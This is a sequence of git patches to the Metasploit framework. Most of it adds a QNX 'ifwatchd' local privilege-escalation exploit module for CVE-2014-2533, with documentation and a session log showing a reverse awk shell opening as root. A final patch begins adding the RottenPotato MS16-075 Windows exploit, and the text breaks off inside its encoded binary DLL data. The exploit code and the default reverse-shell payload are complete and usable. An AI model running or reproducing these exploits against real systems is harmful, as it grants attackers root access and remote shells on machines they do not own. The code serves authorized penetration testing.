From bc53413fb52effb5e5d458e2fc52f430479b23b9 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 22 Mar 2018 20:09:03 +0000 Subject: [PATCH 001/192] Add ifwatchd Privilege Escalation exploit module --- .../exploits/qnx/local/ifwatchd_priv_esc.rb | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 modules/exploits/qnx/local/ifwatchd_priv_esc.rb diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb new file mode 100644 index 0000000000..4a97ad9593 --- /dev/null +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -0,0 +1,119 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ifwatchd Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on QNX 6.4.x and 6.5.x + systems by exploiting the ifwatchd suid executable. + + ifwatchd allows users to specify scripts to execute using the '-A' + command line argument; however, it does not drop privileges when + executing user-supplied scripts, resulting in execution of arbitrary + commands as root. + + This module has been tested successfully on QNX Neutrino 6.5.0 SP1. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'cenobyte', # Discovery and exploit + 'Tim Brown', # Independent discovery + 'Brendan Coles' # Metasploit + ], + 'References' => + [ + ['CVE', '2014-2533'], + ['BID', '66449'], + ['EDB', '32153'], + ['URL', 'http://seclists.org/bugtraq/2014/Mar/66'] + ], + 'DisclosureDate' => 'Mar 10 2014', + 'Platform' => 'unix', # QNX + 'Arch' => ARCH_CMD, + 'SessionTypes' => %w(shell meterpreter), + 'Targets' => [['Automatic', {}]], + 'Privileged' => true, + 'Payload' => + { + 'BadChars' => '', + 'DisableNops' => true, + 'Space' => 1024, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'gawk generic' + } + }, + 'DefaultOptions' => + { + 'WfsDelay' => 10, + 'PAYLOAD' => 'cmd/unix/reverse_awk' + } + )) + register_options([ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ]) + end + + def ifwatchd_path + '/sbin/ifwatchd' + end + + def check + unless setuid? ifwatchd_path + vprint_error "#{ifwatchd_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{ifwatchd_path} is setuid" + + CheckCode::Detected + end + + def base_dir + datastore['WritableDir'] + end + + def is_root? + id = cmd_exec 'id' + (id.include?('uid=0') && id.include?('root')) + end + + def exploit + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless check == CheckCode::Detected + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + script_path = "#{base_dir}/.#{rand_text_alphanumeric rand(10..15)}" + + print_status 'Writing interface arrival event script...' + cmd_exec "echo '#!/bin/sh' > #{script_path}" + cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}" + cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"ifwatchd -A\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}" + cmd_exec "echo \"#{payload.encoded.gsub('"', '\"')}\" >> #{script_path}" + cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" + + cmd_exec "chmod +x '#{script_path}'" + + print_status "Executing #{ifwatchd_path}..." + interface = 'lo0' + cmd_exec "#{ifwatchd_path} -A '#{script_path}' -v #{interface} >/dev/null & echo " + + Rex.sleep 5 + + cmd_exec "rm -f '#{script_path}'" + end +end From 05c5d116c582b5147a34744174647c72703116cc Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 22 Mar 2018 20:23:32 +0000 Subject: [PATCH 002/192] Add documentation --- .../exploit/qnx/local/ifwatchd_priv_esc.md | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) create mode 100644 documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md new file mode 100644 index 0000000000..cc138ac9d7 --- /dev/null +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -0,0 +1,61 @@ +## Description + + This module attempts to gain root privileges on QNX 6.4.x and 6.5.x + systems by exploiting the `ifwatchd` suid executable. + + +## Vulnerable Application + + `ifwatchd` allows users to specify scripts to execute using the `-A` + command line argument; however, it does not drop privileges when + executing user-supplied scripts, resulting in execution of arbitrary + commands as root. + + This module has been tested successfully on QNX Neutrino 6.5.0 SP1. + + QNX Neutrino 6.5.0 Service Pack 1 is available here: + + * http://www.qnx.com/download/feature.html?programid=23665 + + +## Verification Steps + + 1. Start `msfconsole` + 2. `use exploit/qnx/local/ifwatchd_priv_esc` + 3. `set session ` + 4. `run` + 5. You should get a *root* session + + +## Options + + **SESSION** + + Which session to use, which can be viewed with `sessions` + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + +## Scenarios + + ``` + msf5 > use exploit/qnx/local/ifwatchd_priv_esc + msf5 exploit(qnx/local/ifwatchd_priv_esc) > set session 1 + session => 1 + msf5 exploit(qnx/local/ifwatchd_priv_esc) > set lhost 172.16.191.188 + lhost => 172.16.191.188 + msf5 exploit(qnx/local/ifwatchd_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.188:4444 + [*] Writing interface arrival event script... + [*] Executing /sbin/ifwatchd... + [*] Command shell session 2 opened (172.16.191.188:4444 -> 172.16.191.215:65500) at 2018-03-22 15:18:48 -0400 + + id + uid=100(test) gid=100 euid=0(root) + uname -a + QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86 + ``` + From 741c526555fb1bd42275e6f60709b87ce8383c9b Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 23 Mar 2018 17:53:30 +0000 Subject: [PATCH 003/192] Kill correct instance of ifwatchd --- modules/exploits/qnx/local/ifwatchd_priv_esc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb index 4a97ad9593..be077ddeb1 100644 --- a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Local print_status 'Writing interface arrival event script...' cmd_exec "echo '#!/bin/sh' > #{script_path}" cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}" - cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"ifwatchd -A\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}" + cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}" cmd_exec "echo \"#{payload.encoded.gsub('"', '\"')}\" >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" From 0116628208101924280fa18b488ee09e14a1308b Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 24 Mar 2018 00:19:30 +0000 Subject: [PATCH 004/192] Update tested versions --- documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md | 5 ++++- modules/exploits/qnx/local/ifwatchd_priv_esc.rb | 3 ++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md index cc138ac9d7..6fc9e281cd 100644 --- a/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md +++ b/documentation/modules/exploit/qnx/local/ifwatchd_priv_esc.md @@ -11,7 +11,10 @@ executing user-supplied scripts, resulting in execution of arbitrary commands as root. - This module has been tested successfully on QNX Neutrino 6.5.0 SP1. + This module has been tested successfully on: + + * QNX Neutrino 6.5.0 (x86) + * QNX Neutrino 6.5.0 SP1 (x86) QNX Neutrino 6.5.0 Service Pack 1 is available here: diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb index be077ddeb1..7e7662f62b 100644 --- a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Local executing user-supplied scripts, resulting in execution of arbitrary commands as root. - This module has been tested successfully on QNX Neutrino 6.5.0 SP1. + This module has been tested successfully on QNX Neutrino 6.5.0 (x86) + and 6.5.0 SP1 (x86). }, 'License' => MSF_LICENSE, 'Author' => From 7c4207fc7e4551b1a89810f5a1eac7329faf14df Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 24 Mar 2018 02:57:30 +0000 Subject: [PATCH 005/192] Fix escaping --- modules/exploits/qnx/local/ifwatchd_priv_esc.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb index 7e7662f62b..d645273fe2 100644 --- a/modules/exploits/qnx/local/ifwatchd_priv_esc.rb +++ b/modules/exploits/qnx/local/ifwatchd_priv_esc.rb @@ -104,7 +104,8 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "echo '#!/bin/sh' > #{script_path}" cmd_exec "echo 'PATH=/bin:/usr/bin' >> #{script_path}" cmd_exec "echo 'IFWPID=$(ps -edaf | grep \"#{script_path}\" | awk \"!/grep/ { print $2 }\")' >> #{script_path}" - cmd_exec "echo \"#{payload.encoded.gsub('"', '\"')}\" >> #{script_path}" + exp = payload.encoded.gsub('"', '\"').gsub('$', '\$') + cmd_exec "echo \"#{exp}\" >> #{script_path}" cmd_exec "echo 'kill -9 $IFWPID' >> #{script_path}" cmd_exec "chmod +x '#{script_path}'" From 4a88d643ba4e931f84f00f6864b5676f3f56c244 Mon Sep 17 00:00:00 2001 From: Mumbai Date: Fri, 3 Aug 2018 02:09:24 -0400 Subject: [PATCH 006/192] adding reflective Potato --- .../rottenpotato/rottenpotato.x64.dll | Bin 0 -> 327680 bytes .../rottenpotato/rottenpotato.x86.dll | Bin 0 -> 251392 bytes .../exploits/rottenpotato/BlockingQueue.h | 41 ++ .../exploits/rottenpotato/IStorageTrigger.cpp | 143 +++++++ .../exploits/rottenpotato/IStorageTrigger.h | 35 ++ .../exploits/rottenpotato/LocalNegotiator.cpp | 115 ++++++ .../exploits/rottenpotato/LocalNegotiator.h | 21 + .../exploits/rottenpotato/MSFRottenPotato.cpp | 374 ++++++++++++++++++ .../exploits/rottenpotato/MSFRottenPotato.h | 35 ++ .../rottenpotato/ReflectiveDllInjection.h | 51 +++ .../exploits/rottenpotato/ReflectiveLoader.h | 223 +++++++++++ .../source/exploits/rottenpotato/dllmain.cpp | 79 ++++ .../source/exploits/rottenpotato/stdafx.cpp | 8 + .../source/exploits/rottenpotato/stdafx.h | 16 + .../source/exploits/rottenpotato/targetver.h | 8 + .../windows/local/ms16_075_reflection.rb | 124 ++++++ 16 files changed, 1273 insertions(+) create mode 100644 data/exploits/rottenpotato/rottenpotato.x64.dll create mode 100644 data/exploits/rottenpotato/rottenpotato.x86.dll create mode 100644 external/source/exploits/rottenpotato/BlockingQueue.h create mode 100644 external/source/exploits/rottenpotato/IStorageTrigger.cpp create mode 100644 external/source/exploits/rottenpotato/IStorageTrigger.h create mode 100644 external/source/exploits/rottenpotato/LocalNegotiator.cpp create mode 100644 external/source/exploits/rottenpotato/LocalNegotiator.h create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato.cpp create mode 100644 external/source/exploits/rottenpotato/MSFRottenPotato.h create mode 100644 external/source/exploits/rottenpotato/ReflectiveDllInjection.h create mode 100644 external/source/exploits/rottenpotato/ReflectiveLoader.h create mode 100644 external/source/exploits/rottenpotato/dllmain.cpp create mode 100644 external/source/exploits/rottenpotato/stdafx.cpp create mode 100644 external/source/exploits/rottenpotato/stdafx.h create mode 100644 external/source/exploits/rottenpotato/targetver.h create mode 100644 modules/exploits/windows/local/ms16_075_reflection.rb diff --git a/data/exploits/rottenpotato/rottenpotato.x64.dll b/data/exploits/rottenpotato/rottenpotato.x64.dll new file mode 100644 index 0000000000000000000000000000000000000000..7d934a39d8f3fc9182d0d6b6cb0e2782037837af GIT binary patch literal 327680 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 